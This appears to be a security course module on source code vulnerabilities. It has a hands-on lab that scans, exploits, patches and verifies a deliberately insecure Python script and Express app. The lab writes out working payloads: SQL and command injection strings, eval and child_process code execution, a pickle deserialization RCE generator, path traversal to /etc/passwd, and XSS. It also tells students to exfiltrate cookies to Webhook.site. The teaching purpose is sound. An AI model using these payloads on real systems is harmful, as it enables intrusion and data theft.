Source Code Vulnerability Management
Objectives: By the end of this topic, you will be able to…
- Detect common vulnerabilities in real source code
- Use static analysis tools to automate code review
- Apply critical thinking to interpret and validate findings
- Exploit confirmed vulnerabilities to demonstrate their real-world impact
- Propose secure improvements to the code and verify they eliminate the attack vector
What is a vulnerability in code?
A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.
Main causes of vulnerabilities
Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.
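The authenticated-but-not-authorized flaw described above can be sketched as follows. This is a minimal illustration, not code from the lab: the `User` class, both `delete_account_*` functions, and the `"admin"` role name are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class User:
    """Hypothetical user model, for illustration only."""
    name: str
    is_authenticated: bool
    role: str  # e.g. "admin" or "member"


def delete_account_vulnerable(requester: User, target: str) -> str:
    # Logic flaw: only authentication is checked, so any logged-in
    # user can perform an action meant for administrators.
    if not requester.is_authenticated:
        raise PermissionError("Login required")
    return f"deleted {target}"


def delete_account_safe(requester: User, target: str) -> str:
    # Check identity first, then privilege.
    if not requester.is_authenticated:
        raise PermissionError("Login required")
    if requester.role != "admin":
        raise PermissionError("Admin role required")
    return f"deleted {target}"
```

Both functions are syntactically clean and call no dangerous API, which is why a pattern-based scanner is unlikely to flag the first one.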
Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:
# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:
/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
/* Safe: limits the copy to n-1 bytes */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';
Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:
# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")
Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:
# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
    return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
    record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
    # A missing record gets the same error, so valid IDs cannot be enumerated
    if record is None or record.owner_id != user_id:
        raise PermissionError("Access denied")
    return record
Relevant OWASP Top 10 categories
The OWASP Top 10 lists the most critical web application security risks. The categories most closely related to source code are listed below; the numbering follows the 2021 edition:
| Category | Description | Example |
|---|---|---|
| A01 — Broken Access Control | Unauthorized access to functions or data | IDOR (Insecure Direct Object Reference) |
| A03 — Injection | SQL, OS command, or other injection | Inadequate input validation |
| A07 — Auth Failures | Authentication or session management failures | Token reuse, weak passwords |
| A08 — Integrity Failures | Using compromised dependencies without verification | Libraries without hash checks |
| A09 — Logging Failures | Not logging relevant events | Ongoing attacks undetected |
| A10 — SSRF | User-controlled destination in outbound requests | Internal network scanning |
Static vs dynamic analysis
SAST (Static Application Security Testing)
SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.
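To make "examining code without executing it" concrete, here is a deliberately tiny static check built on Python's standard `ast` module. It is a sketch of the general idea only and does not reflect how Bandit or Semgrep are implemented; the `RISKY_CALLS` set and the `find_risky_calls` name are assumptions made for this example.

```python
import ast

# Call names treated as risky in this sketch; real tools ship far larger rule sets.
RISKY_CALLS = {"eval", "exec"}


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line, name) for each direct call to a name in RISKY_CALLS."""
    findings = []
    # The source is parsed into a syntax tree; nothing in it is ever run.
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in RISKY_CALLS
        ):
            findings.append((node.lineno, node.func.id))
    return sorted(findings)


sample = '''
user_input = input("expr: ")
print(eval(user_input))
label = "eval(x) inside a string is not a call"
'''

for line, name in find_risky_calls(sample):
    print(f"line {line}: call to {name}()")  # prints: line 3: call to eval()
```

The check ignores the word "eval" inside the string literal, which a plain text search would not. It also misses an aliased call such as `f = eval` followed by `f(x)`, a small example of why static findings and non-findings both need human review.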
Dynamic analysis (DAST or IAST)
Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.
SAST tools
| Tool | Language | Description |
|---|---|---|
| Bandit | Python | Reviews code for insecure practices |
| Semgrep | Multi-language | Lightweight, customizable pattern detection |
| Flawfinder | C/C++ | Classic tool for insecure function detection |
| SonarQube | Multi-language | Supports custom rules, quality + security |
| CodeQL | Multi-language | Complex pattern queries on code (GitHub) |
| Brakeman | Ruby on Rails | Analysis for Rails applications |
| ESLint + Security Plugins | JavaScript/TypeScript | Security-focused linting |
These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.
Interpreting and validating findings
Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.
Hands-on lab
Requirements: Kali Linux, bandit, semgrep, Node.js
Part 0: Setting up the lab
# Install pipx
sudo apt install pipx
# Install scanner tools
pipx install bandit
pipx install semgrep
Create a Semgrep account at semgrep.dev using your GitHub account.
Part 1: Python CLI tool
You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.
Step 1 — Scan. Run Bandit and save the full report:
bandit -r insecure_script.py 2>&1 | tee bandit_before.txt
For every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is, before reading the code in depth.
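Recording findings by hand works for a small script. For longer reports, Bandit can also write JSON (`bandit -r insecure_script.py -f json -o bandit_before.json`), which can be sorted programmatically. The sketch below assumes each entry in the report's `results` list carries `issue_severity`, `test_id`, `line_number`, and `issue_text` fields; check this against your own report. The sample data is invented for illustration and is not the lab's real output.

```python
import json

SEVERITY_ORDER = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}


def triage(report: dict) -> list[dict]:
    """Keep HIGH and MEDIUM findings, most severe first, then by line number."""
    keep = [
        r for r in report.get("results", [])
        if r.get("issue_severity") in ("HIGH", "MEDIUM")
    ]
    return sorted(
        keep,
        key=lambda r: (SEVERITY_ORDER[r["issue_severity"]], r["line_number"]),
    )


# Invented sample shaped like a Bandit JSON report (not real lab output).
sample_report = json.loads("""
{"results": [
  {"test_id": "B404", "issue_severity": "LOW", "line_number": 2,
   "issue_text": "import of subprocess module"},
  {"test_id": "B307", "issue_severity": "MEDIUM", "line_number": 30,
   "issue_text": "use of eval"},
  {"test_id": "B602", "issue_severity": "HIGH", "line_number": 22,
   "issue_text": "subprocess call with shell=True"}
]}
""")

for finding in triage(sample_report):
    print(
        f'{finding["issue_severity"]:<6} {finding["test_id"]} '
        f'line {finding["line_number"]}: {finding["issue_text"]}'
    )
```

To run it on a real report, replace `sample_report` with the result of `json.load()` on the file Bandit wrote.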
Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.
python3 insecure_script.py
User lookup — SQL injection:
At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?
Network ping — command injection:
Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.
Calculator — arbitrary code execution via eval:
Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.
Session loader — pickle deserialization RCE:
Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:
python3 -c "
import pickle, os, base64
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"
Paste the output at the session loader prompt and observe the command execute before load_session returns.
One-time tokens — insecure randomness:
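The script prints five tokens generated by random.randint. Note the time at which they were generated. Assuming the script seeds the generator with random.seed(int(time.time())), run the following shortly afterwards to try every seed from the last five minutes; one of the printed rows should match the script's tokens:
python3 -c "
import random, time
now = int(time.time())
for seed in range(now - 300, now + 1):
    random.seed(seed)
    print(seed, [random.randint(100000, 999999) for _ in range(5)])
"
A generator seeded from the system clock lets an attacker who knows the approximate generation time reproduce every token by trying each candidate second. When no seed is given, Python seeds random from operating system entropy, but its Mersenne Twister output can still be predicted from enough observed values, so random must not be used for security tokens in either case.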
Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.
Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:
| Vulnerability | Secure pattern |
|---|---|
| SQL injection | Parameterized queries: cursor.execute(query, (param,)) |
| Command injection | Pass arguments as a list, no shell=True: subprocess.check_output(["ping", "-c", "1", host]) |
| eval / exec | Remove or replace; use ast.literal_eval only for safe literal parsing |
| Pickle deserialization | Use json for untrusted data |
| Hardcoded credentials | os.environ.get("VAR_NAME") — never store secrets in source code |
| Weak password hash | bcrypt or argon2 for passwords; hashlib.sha256 for non-secret digests |
| Insecure random | secrets.token_hex() or secrets.randbelow() for security-sensitive values |
Add a short comment to every line you change explaining what you fixed and why.
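Several rows of the table can be sketched with the standard library alone. Treat the following as one possible shape for the fixes, not the expected solution: every function name is hypothetical, the ping helper assumes the tool only needs to accept literal IP addresses, and the six-digit token format is taken from the reproduction snippet in Step 2.

```python
import ast
import ipaddress
import json
import secrets


def ping_argv(host: str) -> list[str]:
    """Build an argument list for ping; never a shell string."""
    # ip_address() raises ValueError for anything that is not a literal IP,
    # so "127.0.0.1; whoami" is rejected before any process is started.
    addr = ipaddress.ip_address(host)
    return ["ping", "-c", "1", str(addr)]  # pass this list to subprocess.run()


def parse_number(text: str) -> float:
    """Parse a numeric literal without evaluating code."""
    # literal_eval accepts literals only; calls such as __import__(...) raise ValueError.
    value = ast.literal_eval(text)
    if isinstance(value, bool) or not isinstance(value, (int, float)):
        raise ValueError("expected a number")
    return value


def load_session(raw: str) -> dict:
    """Decode session data as JSON, which cannot carry executable objects."""
    data = json.loads(raw)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    return data


def one_time_token() -> str:
    """Six-digit token drawn from the OS CSPRNG instead of random.randint."""
    return str(100000 + secrets.randbelow(900000))
```

Note that `ast.literal_eval` does not evaluate arithmetic such as `2+3`, so it replaces `eval` only where the input is meant to be a plain literal; a real calculator would need a dedicated expression parser.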
Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.
bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py
? Which finding was hardest to exploit, and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?
Part 2: Node.js web application
You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.
Step 1 — Deploy and scan.
cd nodejs-app
npm install
npm start & # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txt
For each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.
Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.
Hardcoded secrets — static finding:
Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.
Reflected XSS — GET /hello:
Open a browser and navigate to:
http://localhost:3000/hello?name=<script>alert(document.cookie)</script>
Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.
SQL injection — GET /user:
# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/user
Compare what you receive to what the endpoint is supposed to return for a normal request.
Path traversal — GET /file:
curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/file
How far outside the intended directory can you navigate? What limits you?
Command injection — GET /ping:
curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/ping
IDOR — GET /note:
curl "http://localhost:3000/note?id=1"
No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?
Credentials in URL — GET /login:
curl "http://localhost:3000/login?username=admin&password=admin123"
Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.
eval RCE — GET /calc:
curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calc
Missing security headers:
curl -I http://localhost:3000/hello
Note which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.
Step 3 — Patch. Fix every finding in app.js:
| Vulnerability | Secure pattern |
|---|---|
| Hardcoded secrets | process.env.VAR_NAME; document required variables in a .env.example file |
| Reflected XSS | Escape user input before inserting it into HTML; add a Content-Security-Policy header |
| SQL injection | Parameterized queries using ? placeholders: db.get(query, [param], callback) |
| Path traversal | path.resolve() the final path and assert it starts with the allowed directory followed by path.sep, so that a sibling directory sharing the same prefix does not pass the check |
| Command injection | Use execFile with an argument array instead of exec with a shell string |
| IDOR | Require authentication; verify the authenticated user owns the requested resource |
| Credentials in URL | Accept credentials via POST body only; never read passwords from query parameters |
| eval RCE | Remove the endpoint; if a calculator is needed, use a safe math parser library |
| Missing headers | app.use(require('helmet')()) as the first middleware |
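The lab fixes themselves belong in app.js, but two of the patterns in the table are language-independent. They are sketched here in Python, to stay consistent with Part 1, as a reference for the logic rather than as the solution. `BASE_DIR`, `safe_path`, and `greeting` are hypothetical names, and the directory is an assumed example path.

```python
import html
from pathlib import Path

# Hypothetical directory the endpoint is allowed to serve from.
BASE_DIR = Path("/srv/app/public")


def safe_path(name: str, base: Path = BASE_DIR) -> Path:
    """Resolve name under base and refuse anything that escapes it."""
    base = base.resolve()
    candidate = (base / name).resolve()  # collapses ".." segments and symlinks
    # is_relative_to (Python 3.9+) compares whole path components, so
    # "/srv/app/public-old" is not mistaken for a child of "/srv/app/public".
    if not candidate.is_relative_to(base):
        raise PermissionError(f"path escapes {base}")
    return candidate


def greeting(name: str) -> str:
    """Escape user input before placing it in HTML."""
    return f"<h1>Hello, {html.escape(name)}</h1>"
```

The same two steps carry over to the Express code: resolve first and compare second for file access, and escape at the point where user input meets markup.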
Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:
pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txt
Rerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.
? Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?
Cleanup
pkill -f "node app.js"
Submission
Compressed folder including:
- bandit_before.txt and bandit_after.txt
- semgrep_before.txt and semgrep_after.txt
- Terminal output or screenshots for every successful exploit (before patching)
- Patched insecure_script.py and app.js with explanatory comments on every changed line
- Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why
Key concepts
| Term | Definition |
|---|---|
| SAST | Source code analysis without executing the application |
| Vulnerability | Exploitable weakness in a system or application |
| SQLi | Injection of malicious SQL code into input fields |
| XSS | Injection of malicious scripts into web pages |
| Bandit | SAST tool for Python code |
| Semgrep | Multi-language and customizable static analyzer |
| OWASP Top 10 | List of the ten most critical web vulnerabilities |